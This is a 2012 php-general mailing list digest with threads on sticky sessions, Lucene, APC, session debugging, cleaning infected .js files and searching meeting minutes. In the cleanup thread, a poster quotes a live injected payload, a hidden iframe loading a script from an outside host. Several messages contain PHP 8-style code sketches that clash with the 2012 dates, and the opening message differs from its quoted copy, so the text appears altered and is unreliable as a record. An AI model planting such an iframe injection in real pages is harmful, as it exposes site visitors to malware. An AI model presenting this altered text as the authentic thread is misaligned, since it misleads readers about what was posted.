php-general Digest 13 Dec 2012 13:49:56 -0000 Issue 8064

Topics (messages 319849 through 319867):

Php application with session used in a cluster
        319849 by: Jan Vávra
        319858 by: Jim Lucas

Re: Lucene library
        319850 by: marco.behnke.biz

Compile APC in PHP 5.2
        319851 by: Alexander Diedler
        319852 by: Sebastian Krebs

Re: Session ?
        319853 by: Jim Giner
        319866 by: marco.behnke.biz
        319867 by: Jim Giner

preg_replace question
        319854 by: Curtis Maurand
        319855 by: Maciek Sokolewicz
        319857 by: Ashley Sheridan
        319860 by: Curtis Maurand
        319862 by: Maciek Sokolewicz
        319864 by: Curtis Maurand
        319865 by: Simon J Welsh

storing & searching docs
        319856 by: Jim Giner
        319859 by: Paul M Foster
        319861 by: Maciek Sokolewicz
        319863 by: Maciek Sokolewicz

Administrivia:

To subscribe to the digest, e-mail:
        php-general-digest-subscr...@lists.php.net

To unsubscribe from the digest, e-mail:
        php-general-digest-unsubscr...@lists.php.net

To post to the list, e-mail:
        php-gene...@lists.php.net


----------------------------------------------------------------------
--- Begin Message ---
Hello,
we are considering running PHP on several application servers behind Apache mod_proxy_balancer. Our PHP app uses session cookies, and we would like to use session stickiness: once the user connects to app server X and gets the session cookie, all further requests will be balanced (reverse proxied) to app server X. We see these theoretical possibilities:

1. Add our own Set-Cookie: Cluster-Node=blabla.X header to each response.
When the user sends further requests to the Apache balancer, the balancer reads the value X from our Cluster-Node cookie and so knows which app server to forward to. Problem: does PHP have something like the .NET post-request handler? ("Post" here means "after".) That is, after the request has been processed by the PHP application code, the "post-request handler" fires and calls header("Set-Cookie: Cluster-Node=blabla.X").

2. Modify the PHP session management system.
We need to append the string ".X" to the PHP session ID value. Is there a way to do that?

3. Write our own session management system for a single app server or for all of them.
The most work-intensive option ;-(

My source is a paragraph from the Apache mod_proxy_balancer manual:
http://httpd.apache.org/docs/2.2/mod/mod_proxy_balancer.html

Some back-ends use a slightly different form of stickyness cookie, for instance Apache Tomcat. Tomcat adds the name of the Tomcat instance to the end of its session id cookie, separated with a dot (|.|) from the session id. Thus if the Apache web server finds a dot in the value of the stickyness cookie, it only uses the part behind the dot to search for the route. In order to let Tomcat know about its instance name, you need to set the attribute |jvmRoute| inside the Tomcat configuration file |conf/server.xml| to the value of the route of the worker that connects to the respective Tomcat. The name of the session cookie used by Tomcat (and more generally by Java web applications based on servlets) is |JSESSIONID| (upper case) but can be configured to something else.

And the last possibility is:
4. Can Apache mod_proxy_balancer stick sessions by the session cookie name?
Each app server could have its own session.name=PHPSESSION-X. But that is a question for a different forum...
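
For option 1, a minimal sketch, assuming the balancer is configured with stickysession=Cluster-Node and each BalancerMember has a route= value. The constant NODE_ROUTE and the helper route_cookie_value() are hypothetical names for illustration. No post-request handler should be needed, because setcookie() only queues a header and can be called anywhere before output starts.

```php
<?php
// Hypothetical: NODE_ROUTE must match the route= value that the balancer
// configuration assigns to this particular app server.
const NODE_ROUTE = 'X';

/** Build a cookie value whose part after the dot names the route. */
function route_cookie_value(string $prefix, string $route): string
{
    return $prefix . '.' . $route;
}

// Queue the cookie header; skipped on the command line or once output began.
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    setcookie('Cluster-Node', route_cookie_value('blabla', NODE_ROUTE), 0, '/');
}
```

Keeping the route in a separate cookie leaves the PHP session ID untouched, which matters because the default file-based session handler rejects a dot in the session ID.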

Can anybody give me some advice?

Thanks.
Jan.

--- End Message ---
--- Begin Message ---
On 12/12/2012 05:19 AM, Jan Vávra wrote:
Hello,
we are considering to use a php on several application servers behind
the apache mod_proxy_balancer. Our php app is using session cookies. And
we would like to use session stickiness - once the user connects to app
server X and gets the session cookie, all other requests will be
balanced (reverse proxied) to the app server X. We have these
theoretical possibilities:


[...]


Can anybody give me some advice?

Why not use database-driven sessions? There are many examples on the net of how to set up such a system to replace the file-based system used by default.
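
A minimal sketch of such a database-driven handler, assuming PHP 8 and PDO. The class name PdoSessionHandler and the sessions table layout (id, data, updated_at) are hypothetical, and locking and error handling are left out.

```php
<?php
// Hypothetical PDO-backed session handler (a sketch, not production code).
// Assumes a table: sessions(id PRIMARY KEY, data, updated_at).
final class PdoSessionHandler implements SessionHandlerInterface
{
    public function __construct(private PDO $pdo) {}

    public function open(string $path, string $name): bool { return true; }

    public function close(): bool { return true; }

    public function read(string $id): string|false
    {
        $stmt = $this->pdo->prepare('SELECT data FROM sessions WHERE id = ?');
        $stmt->execute([$id]);
        $data = $stmt->fetchColumn();
        // An unknown session ID must yield an empty string, not false.
        return $data === false ? '' : (string) $data;
    }

    public function write(string $id, string $data): bool
    {
        // REPLACE INTO is understood by both MySQL and SQLite.
        $stmt = $this->pdo->prepare(
            'REPLACE INTO sessions (id, data, updated_at) VALUES (?, ?, ?)'
        );
        return $stmt->execute([$id, $data, time()]);
    }

    public function destroy(string $id): bool
    {
        $stmt = $this->pdo->prepare('DELETE FROM sessions WHERE id = ?');
        return $stmt->execute([$id]);
    }

    public function gc(int $max_lifetime): int|false
    {
        $stmt = $this->pdo->prepare('DELETE FROM sessions WHERE updated_at < ?');
        $stmt->execute([time() - $max_lifetime]);
        return $stmt->rowCount();
    }
}

// Usage, before any output is sent:
//   session_set_save_handler(new PdoSessionHandler($pdo), true);
//   session_start();
```

With all app servers pointing at the same database, any node can serve any request, so sticky routing becomes an optimization rather than a requirement.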


Thanks.
Jan.



--
Jim Lucas

http://www.cmsws.com/
http://www.cmsws.com/examples/

--- End Message ---
--- Begin Message ---

Louis Huppenbauer <louis.huppenba...@gmail.com> wrote on 12 December 2012 at 07:07:
> There's Zend_Search_Lucene, part of the Zend framework. I think it should
> be possible to use it without the whole framework though.
>
> http://framework.zend.com/manual/1.12/de/zend.search.lucene.html


see
http://www.phpgangsta.de/die-eigene-suchmaschine-in-php-leicht-gemacht-lucene

>
>
> 2012/12/12 Larry Garfield <la...@garfieldtech.com>
>
> > Yes, I've worked with Apache Solr quite a bit.  It's a separate server,
> > however, and I'm looking for something with smaller requirements for a
> > concept I want to try. I'd consider SQLite, but I really need something
> > schema-free and PHP-native/easily-installable.
> >
> > --Larry Garfield
> >
> >
> > On 12/11/2012 07:20 PM, israele...@gmail.com wrote:
> >
> >> Check out apache solr.
> >>
> >> The php implementation of Lucene was very slow and had a lot of
> >> perfomance issues the last time I tried it
> >> ------Original Message------
> >> From: Larry Garfield
> >> To: php-gene...@lists.php.net
> >> Subject: [PHP] Lucene library
> >> Sent: Dec 11, 2012 5:41 PM
> >>
> >> Hi all.
> >>
> >> I recall hearing about there being a PHP port of the Lucene library some
> >> years ago, but I don't recall whence it came.  It was a stand-alone PHP
> >> lib, which needed some integration to be viable as an actual search
> >> engine but worked up to a point by storing data straight on disk as
> >> files.  That meant it didn't scale beyond a few tens of thousands of
> >> records, but that's still a decent number.
> >>
> >> Does that ring a bell for anyone?  Anyone know if it still exists, and
> >> if so where?  I didn't find it in https://packagist.org/ , which is
> >> where I figured it would be if it were still maintained.
> >>
> >> I may have a use for it if it still exists.
> >>
> >> --Larry Garfield
> >>
> >>
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >

--
Marco Behnke
Dipl. Informatiker (FH), SAE Audio Engineer Diploma
Zend Certified Engineer PHP 5.3

Tel.: 0174 / 9722336
e-Mail: ma...@behnke.biz

Softwaretechnik Behnke
Heinrich-Heine-Str. 7D
21218 Seevetal

http://www.behnke.biz

--- End Message ---
--- Begin Message ---
Hello,
I am trying to get APC working with a self-compiled PHP 5.2.17.
On this Ubuntu machine we have PHP 5.3 installed via apt-get and PHP 5.2
compiled from source (make etc.) as a CGI module.
With PHP 5.3, APC shows up in phpinfo, but not with PHP 5.2. What do we have
to do to get it working?

I followed
http://de2.php.net/manual/de/install.pecl.static.php
but when I run configure with
./configure --prefix=/opt/php5.2 --with-config-file-path=/opt/php5.2 
--with-mysqli --with-mysql --with-pdo-mysql --with-curl --with-gd 
--with-jpeg-dir=/usr --with-png-dir=/usr --with-freetype-dir=/usr --enable-cli 
--enable-fastcgi --enable-discard-path --enable-force-cgi-redirect 
--enable-mbstring --with-bz2 --enable-gd-native-ttf --enable-calendar 
--with-gmp --enable-bcmath --with-xpm-dir=/usr --enable-soap --with-openssl 
--with-zlib --with-apc
configure produces only errors, and it seems that buildconf breaks the
configure file.

I also tried
http://www.linuxask.com/questions/how-to-compile-apc-module-for-php
but when I add extension=apc.so and restart, APC is not shown in phpinfo.



Best regards
Alexander




--- End Message ---
--- Begin Message ---
Hi,

You should definitely not use PHP5.2 anymore.

Regards,
Sebastian


2012/12/12 Alexander Diedler <adied...@tecracer.de>

> Hello,
> I try to get APC working for a compiled PHP 5.2.17.
> On this Ubuntu, we have an PHP 5.3 installed with APT-GET and a PHP 5.2 as
> CGI module compiled with make etc.
> In the PHP 5.3 I got APC running in phpinfo, but not in PHP 5.2, what we
> have to do to get work it?
>
> I use this
> http://de2.php.net/manual/de/install.pecl.static.php
> but if I use the configure with
> ./configure --prefix=/opt/php5.2 --with-config-file-path=/opt/php5.2
> --with-mysqli --with-mysql --with-pdo-mysql --with-curl --with-gd
> --with-jpeg-dir=/usr --with-png-dir=/usr --with-freetype-dir=/usr
> --enable-cli --enable-fastcgi --enable-discard-path
> --enable-force-cgi-redirect --enable-mbstring --with-bz2
> --enable-gd-native-ttf --enable-calendar --with-gmp --enable-bcmath
> --with-xpm-dir=/usr --enable-soap --with-openssl --with-zlib --with-apc
> There are only errors in the configure and it seems, that buildconf
> destroy the configure file.
>
> I try also
> http://www.linuxask.com/questions/how-to-compile-apc-module-for-php
> but if I add extension=apc.so and restart, it will not be shown in phpinfo.
>
>
>
> Best regards
> Alexander
>
>
>
>


-- 
github.com/KingCrunch

--- End Message ---
--- Begin Message ---
On 12/12/2012 8:08 AM, ma...@behnke.biz wrote:


Jim Giner <jim.gi...@albanyhandball.com> wrote on 12 December 2012 at 02:53:
On 12/11/2012 7:27 PM, Marco Behnke wrote:
On 08.12.12 19:08, Jim Giner wrote:
All my debugging messages indicate that I have the same session id,
yet I don't have the same variables, ie, they're missing.
Just to be sure ... the webspace is on the same server and has access to
the same directory where the session data is stored? (session_save_path)?


Yes - it points to a folder within my main domain's structure.

which is accessible from your subdomains?


They are all pointing (re the ini file) to the default of /tmp so I presume that they all have access to that folder.
--- End Message ---
--- Begin Message ---
On 12.12.12 15:58, Jim Giner wrote:
> On 12/12/2012 8:08 AM, ma...@behnke.biz wrote:
>>
>>
>> Jim Giner <jim.gi...@albanyhandball.com> wrote on 12 December 2012 at
>> 02:53:
>>> On 12/11/2012 7:27 PM, Marco Behnke wrote:
>>>> On 08.12.12 19:08, Jim Giner wrote:
>>>>> All my debugging messages indicate that I have the same session id,
>>>>> yet I don't have the same variables, ie, they're missing.
>>>> Just to be sure ... the webspace is on the same server and has
>>>> access to
>>>> the same directory where the session data is stored?
>>>> (session_save_path)?
>>>>
>>>>
>>> Yes - it points to a folder within my main domain's structure.
>>
>> which is accessible from your subdomains?
>>
>>>
> They are all pointing (re the ini file) to the default of /tmp so I
> presume that they all have access to that folder.

Ok, that is a different answer from the previous one where you said "it
points to a folder within my main domain's structure"

Are you running on error_reporting(E_ALL) and ini_set('display_errors',
'On')?
Just to be sure that there are no hidden notices or warnings.
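
A small diagnostic sketch along those lines, to be run on both the main domain and the subdomain. It assumes the default file-based session handler, and the fallback to the system temp directory when session.save_path is unset is how that handler typically behaves.

```php
<?php
// Show every notice and warning while debugging.
error_reporting(E_ALL);
ini_set('display_errors', '1');

// session_save_path() returns '' when php.ini leaves session.save_path unset;
// the files handler then typically uses the system temp directory.
$path = session_save_path();
if ($path === '' || $path === false) {
    $path = sys_get_temp_dir();
}

printf(
    "session.save_path: %s\nwritable by PHP: %s\n",
    $path,
    is_writable($path) ? 'yes' : 'no'
);
```

If the two hosts print different paths, the same session ID will map to different session files, which would explain missing variables.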


-- 
Marco Behnke
Dipl. Informatiker (FH), SAE Audio Engineer Diploma
Zend Certified Engineer PHP 5.3

Tel.: 0174 / 9722336
e-Mail: ma...@behnke.biz

Softwaretechnik Behnke
Heinrich-Heine-Str. 7D
21218 Seevetal

http://www.behnke.biz


--- End Message ---
--- Begin Message ---
On 12/12/2012 5:25 PM, Marco Behnke wrote:
On 12.12.12 15:58, Jim Giner wrote:
On 12/12/2012 8:08 AM, ma...@behnke.biz wrote:


Jim Giner <jim.gi...@albanyhandball.com> wrote on 12 December 2012 at
02:53:
On 12/11/2012 7:27 PM, Marco Behnke wrote:
On 08.12.12 19:08, Jim Giner wrote:
All my debugging messages indicate that I have the same session id,
yet I don't have the same variables, ie, they're missing.
Just to be sure ... the webspace is on the same server and has
access to
the same directory where the session data is stored?
(session_save_path)?


Yes - it points to a folder within my main domain's structure.

which is accessible from your subdomains?


They are all pointing (re the ini file) to the default of /tmp so I
presume that they all have access to that folder.

Ok, that is a different answer from the previous one where you said "it
points to a folder within my main domain's structure"

Are you running on error_reporting(E_ALL) and ini_set('display_errors',
'On')?
Just to be sure that there are no hidden notices or warnings.


My subdomain points to a folder within my domain's structure. My session save path is /tmp. You asked two different questions.
--- End Message ---
--- Begin Message ---
I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However, the string is filled with single quotes, semicolons and a lot of other special characters. Will preg_replace(escapeshellarg($String),$replacement) work, or do I need to go through the entire string and escape what needs to be escaped?

--C

--- End Message ---
--- Begin Message ---
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_replace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not actually using regular expressions? Use str_replace or str_ireplace instead.

Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it.
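
To illustrate the difference, a minimal sketch with a made-up needle and subject: str_replace() takes the needle literally, while preg_replace() needs the needle passed through preg_quote() together with the chosen delimiter.

```php
<?php
// Made-up sample data, full of characters that are special in a regex.
$needle  = "document.write('<iframe src=\"x\">');";
$subject = "a(); document.write('<iframe src=\"x\">'); b();";

// Literal replacement: nothing needs escaping.
$viaStr = str_replace($needle, '', $subject);

// Regex replacement: escape the needle and the '/' delimiter first.
$pattern = '/' . preg_quote($needle, '/') . '/';
$viaPreg = preg_replace($pattern, '', $subject);

// Both approaches remove the same text.
var_dump($viaStr === $viaPreg);
```

Since no pattern matching is involved, the str_replace() form is the simpler choice here.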

- Tul

--- End Message ---
--- Begin Message ---

Maciek Sokolewicz <maciek.sokolew...@gmail.com> wrote:

>On 12-12-2012 17:11, Curtis Maurand wrote:
>> I have several poisoned .js files on a server.  I can use find to
>> recursively find them and then use preg_replace to replace the
>string.
>> However the string is filled with single quotes, semi-colons and a
>lot
>> of other special characters.  Will
>> preg_replace(escapeshellarg($String),$replacement) work or do I need
>to
>> go through the entire string and escape what needs to be escaped?
>>
>> --C
>
>First of all, why do you want to use preg_replace when you're not 
>actually using regular expressions??? Use str_replace or str_ireplace 
>instead.
>
>Aside from that, escapeshellarg() escapes strings for use in shell 
>execution. Perl Regexps are not shell commands. It's like using 
>mysqli_real_escape_string() to escape arguments for URLs. That doesn't 
>compute, just like your way doesn't either.
>
>If you DO wish to escape arguments for a regular expression, use 
>preg_quote instead, that's what it's there for. But first, reconsider 
>using preg_replace, since I honestly don't think you need it at all if 
>the way you've posted 
>(preg_replace(escapeshellarg($string),$replacement)) is the way you
>want 
>to use it.
>
>- Tul

Sometimes if all you know is preg_replace(), everything looks like a nail...

-- 
Sent from my Android phone with K-9 Mail. Please excuse my brevity.

--- End Message ---
--- Begin Message ---
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_replace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or str_ireplace instead.

Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it.

Thanks for your response. I'm open to using str_replace; no issue there. My main question was how to properly get a string of JavaScript into a PHP string that could then be processed. I'm not sure I can just put it in quotes and have it work. There are colons, "<", ">", semicolons, and double quotes. Do I just need to go through the string and escape the reserved characters, or is there a function for that?

--C

--- End Message ---
--- Begin Message ---
On 12-12-2012 21:10, Curtis Maurand wrote:
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_replace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not
actually using regular expressions??? Use str_replace or str_ireplace
instead.

Aside from that, escapeshellarg() escapes strings for use in shell
execution. Perl Regexps are not shell commands. It's like using
mysqli_real_escape_string() to escape arguments for URLs. That doesn't
compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use
preg_quote instead, that's what it's there for. But first, reconsider
using preg_replace, since I honestly don't think you need it at all if
the way you've posted
(preg_replace(escapeshellarg($string),$replacement)) is the way you
want to use it.
Thanks for your response.  I'm open to to using str_replace.  no issue
there.  my main question was how to properly get a string of javascript
into a string that could then be processed.  I'm not sure I can just put
that in quotes and have it work.    There are colons, "<",">",
semicolons, and doublequotes.  Do I just need to rifle through the
string and escape the reserved characters or is there a function for that?

--C

Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example:

$string = 'This is a <string with various supposedly "reserved" ``\\ _- characters';
echo str_replace('supposedly', 'imaginary', $string);
would print:
This is a <string with imaginary "reserved" ``\ _- characters

So... why do you want to "escape" these characters?

--- End Message ---
--- Begin Message ---
On 12/12/2012 3:47 PM, Maciek Sokolewicz wrote:
On 12-12-2012 21:10, Curtis Maurand wrote:
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_replace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not
actually using regular expressions??? Use str_replace or str_ireplace
instead.

Aside from that, escapeshellarg() escapes strings for use in shell
execution. Perl Regexps are not shell commands. It's like using
mysqli_real_escape_string() to escape arguments for URLs. That doesn't
compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use
preg_quote instead, that's what it's there for. But first, reconsider
using preg_replace, since I honestly don't think you need it at all if
the way you've posted
(preg_replace(escapeshellarg($string),$replacement)) is the way you
want to use it.
Thanks for your response.  I'm open to to using str_replace.  no issue
there.  my main question was how to properly get a string of javascript
into a string that could then be processed.  I'm not sure I can just put
that in quotes and have it work.    There are colons, "<",">",
semicolons, and doublequotes.  Do I just need to rifle through the
string and escape the reserved characters or is there a function for that?

--C

Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example:

$string = 'This is a <string with various supposedly "reserved" ``\\ _- characters';
echo str_replace('supposedly', 'imaginary', $string);
would print:
This is a <string with imaginary "reserved" ``\ _- characters

So... why do you want to "escape" these characters?

So what about things like quotes within the string or semi-colons, colons and slashes? Don't these need to be escaped when you're loading a string into a variable?

;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');

I need to enclose this entire string and replace it with ""

Thanks

--- End Message ---
--- Begin Message ---
On 13/12/2012, at 10:08 AM, Curtis Maurand <cur...@maurand.com> wrote:
> On 12/12/2012 3:47 PM, Maciek Sokolewicz wrote:
>> On 12-12-2012 21:10, Curtis Maurand wrote:
>>> On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
>>>> On 12-12-2012 17:11, Curtis Maurand wrote:
>>>> 
>>>> First of all, why do you want to use preg_replace when you're not
>>>> actually using regular expressions??? Use str_replace or str_ireplace
>>>> instead.
>>>> 
>>>> Aside from that, escapeshellarg() escapes strings for use in shell
>>>> execution. Perl Regexps are not shell commands. It's like using
>>>> mysqli_real_escape_string() to escape arguments for URLs. That doesn't
>>>> compute, just like your way doesn't either.
>>>> 
>>>> If you DO wish to escape arguments for a regular expression, use
>>>> preg_quote instead, that's what it's there for. But first, reconsider
>>>> using preg_replace, since I honestly don't think you need it at all if
>>>> the way you've posted
>>>> (preg_replace(escapeshellarg($string),$replacement)) is the way you
>>>> want to use it.
>>> Thanks for your response.  I'm open to to using str_replace.  no issue
>>> there.  my main question was how to properly get a string of javascript
>>> into a string that could then be processed.  I'm not sure I can just put
>>> that in quotes and have it work.    There are colons, "<",">",
>>> semicolons, and doublequotes.  Do I just need to rifle through the
>>> string and escape the reserved characters or is there a function for that?
>>> 
>>> --C
>> 
>> Why do you want to escape them? There are no reserved characters in the case 
>> of str_replace. You don't have to put anything in quotes. For example:
>> 
>> $string = 'This is a <string with various supposedly "reserved" ``\\ _- characters';
>> echo str_replace('supposedly', 'imaginary', $string);
>> would print:
>> This is a <string with imaginary "reserved" ``\ _- characters
>> 
>> So... why do you want to "escape" these characters?
>> 
> So what about things like quotes within the string or semi-colons, colons and 
> slashes?  Don't these need to be escaped when you're loading a string into a 
> variable?
> 
> ;document.write('<iframe width="50" height="50" 
> style="width:100px;height:100px;position:absolute;left:-100px;top:0;" 
> src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');
> 
> I need to enclose this entire string and replace it with ""
> 
> Thanks


The only thing you have to worry about is quote characters. Assuming you're 
running 5.3+, just use a nowdoc 
(http://php.net/manual/en/language.types.string.php#language.types.string.syntax.nowdoc).

$String = <<<'STRING'
;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');
STRING;
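
Putting the pieces together, a minimal sketch that holds the injected text in a nowdoc and removes it with str_replace(). The payload shown is a shortened, made-up stand-in, and strip_payload() is a hypothetical helper; the exact injected text would go in its place, on one line, because a nowdoc keeps line breaks literally.

```php
<?php
// Made-up stand-in payload; substitute the exact injected text.
$payload = <<<'PAYLOAD'
;document.write('<iframe src="http://example.invalid/x.cgi"></iframe>');
PAYLOAD;

/** Remove every literal occurrence of $payload from $source. */
function strip_payload(string $source, string $payload): string
{
    return str_replace($payload, '', $source);
}

// Simulated contents of an infected .js file.
$infected = "var a = 1;\n" . $payload . "\nvar b = 2;";
echo strip_payload($infected, $payload);
```

For real files, the same function could be applied to the result of file_get_contents() and written back with file_put_contents(), ideally after taking a backup.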
---
Simon Welsh
Admin of http://simon.geek.nz/



--- End Message ---
--- Begin Message ---
Slightly off-topic perhaps but I'm looking for general input here.

New idea for a project - save the minutes of my firehouse meetings into a mysql table and build a ui to search them for words and such. The docs are written in Word currently. My simplistic idea is to perhaps convert them to something other than Word format and then to store them into a field of a mysql record with the meeting date as a key field. Of course having them online I should also allow for viewing as a document in something close to their original (?) format.

Any ideas - pro or con - on this idea?

--- End Message ---
--- Begin Message ---
On Wed, Dec 12, 2012 at 01:00:41PM -0500, Jim Giner wrote:

> Slightly off-topic perhaps but I'm looking for general input here.
> 
> New idea for a project - save the minutes of my firehouse meetings
> into a mysql table and build a ui to search them for words and such.
> The docs are written in Word currently.  My simplistic idea is to
> perhaps convert them to something other than Word format and then to
> store them into a field of a mysql record with the meeting date as a
> key field.
> Of course having them online I should also allow for viewing as a
> document in something close to their original (?) format.
> 
> Any ideas - pro or con - on this idea?

First off, I'd convert them to RTF (rich text format). Word format is
too ephemeral ( = self-incompatible). RTF is a lowest common denominator
which can be converted to a variety of other formats, and it is a
standardized format that both Word and things like Open Office
understand. The formatting of meeting minutes doesn't call for a very
complicated layout (something that RTF isn't that good with). I would
suggest HTML format, but Word is notoriously atrocious at faithfully
converting its own formats into HTML. The result is horrid.

Second, you've hit on one of my pet peeves. Never never store huge
blocks of text in SQL files. It slows them down and there's no real
reason for it. There's no reason to force a DBMS to schlep around
massive clumps of text or binary data. That's what disk file systems are
for. Store the target data in a file and store a reference to the
location of the data in the SQL database. Or perhaps, use a NoSQL
solution. I don't know much about the internals of nosql systems, but I
would hope that the metadata about the text objects would be stored
separately from the "payload" (text object).
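
A minimal sketch of that layout, assuming PDO and plain-text copies of the minutes. The minutes table and the functions store_minutes() and search_minutes() are hypothetical names, SQLite stands in for MySQL only to keep the example self-contained, and meeting dates are assumed to be in YYYY-MM-DD form so they are safe as file names.

```php
<?php
/** Write the text to a file and record its location in the database. */
function store_minutes(PDO $db, string $dir, string $date, string $text): string
{
    $path = $dir . '/' . $date . '.txt';
    file_put_contents($path, $text);
    $stmt = $db->prepare('REPLACE INTO minutes (meeting_date, path) VALUES (?, ?)');
    $stmt->execute([$date, $path]);
    return $path;
}

/** Return the meeting dates whose text contains $word (case-insensitive). */
function search_minutes(PDO $db, string $word): array
{
    $hits = [];
    $rows = $db->query('SELECT meeting_date, path FROM minutes ORDER BY meeting_date');
    foreach ($rows as $row) {
        if (stripos(file_get_contents($row['path']), $word) !== false) {
            $hits[] = $row['meeting_date'];
        }
    }
    return $hits;
}

// The database holds only metadata: the meeting date and the file location.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE minutes (meeting_date TEXT PRIMARY KEY, path TEXT)');
```

Scanning every file is fine for a few hundred meetings; beyond that an index-based search would be the better fit.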

Paul

-- 
Paul M. Foster
http://noferblatz.com
http://quillandmouse.com

--- End Message ---
--- Begin Message ---
On 12-12-2012 21:03, Paul M Foster wrote:
Second, you've hit on one of my pet peeves. Never never store huge
blocks of text in SQL files. It slows them down and there's no real
reason for it. There's no reason to force a DBMS to schlep around
massive clumps of text or binary data. That's what disk file systems are
for. Store the target data in a file and store a reference to the
location of the data in the SQL database. Or perhaps, use a NoSQL
solution. I don't know much about the internals of nosql systems, but I
would hope that the metadata about the text objects would be stored
separately from the "payload" (text object).

Paul


I actually disagree on this point. In the past, storing data in a database would make the entire database-system extremely slow and would eat up memory. These days, most database-systems can be (or even are) optimized to actually not do this anymore.

One positive aspect of storing such data in a database is the ability to search using full-text searches. For example, you could use the Sphinx Search Engine, which integrates into MySQL very well. It makes searching for specific words, phrases, etc. very simple and VERY fast.

So in this case, storing it in a database WOULD actually be a good idea IMO.

- Tul

--- End Message ---
--- Begin Message ---
On 12-12-2012 21:40, Maciek Sokolewicz wrote:
On 12-12-2012 21:03, Paul M Foster wrote:
Second, you've hit on one of my pet peeves. Never never store huge
blocks of text in SQL files. It slows them down and there's no real
reason for it. There's no reason to force a DBMS to schlep around
massive clumps of text or binary data. That's what disk file systems are
for. Store the target data in a file and store a reference to the
location of the data in the SQL database. Or perhaps, use a NoSQL
solution. I don't know much about the internals of nosql systems, but I
would hope that the metadata about the text objects would be stored
separately from the "payload" (text object).

Paul


I actually disagree on this point. In the past, storing data in a
database would make the entire database-system extremely slow and would
eat up memory. These days, most database-systems can be (or even are)
optimized to actually not do this anymore.

One positive aspect of storing such data in a database is the ability to
search using full-text searches. For example, you could use the Sphinx
Search Engine, which integrates into MySQL very well. It makes searching
for specific words, phrases, etc. very simple and VERY fast.

So in this case, storing it in a database WOULD actually be a good idea
IMO.

- Tul

Actually, I have to come back on that one. You could also store it locally in files, and feed it into the searchd daemon manually.


--- End Message ---
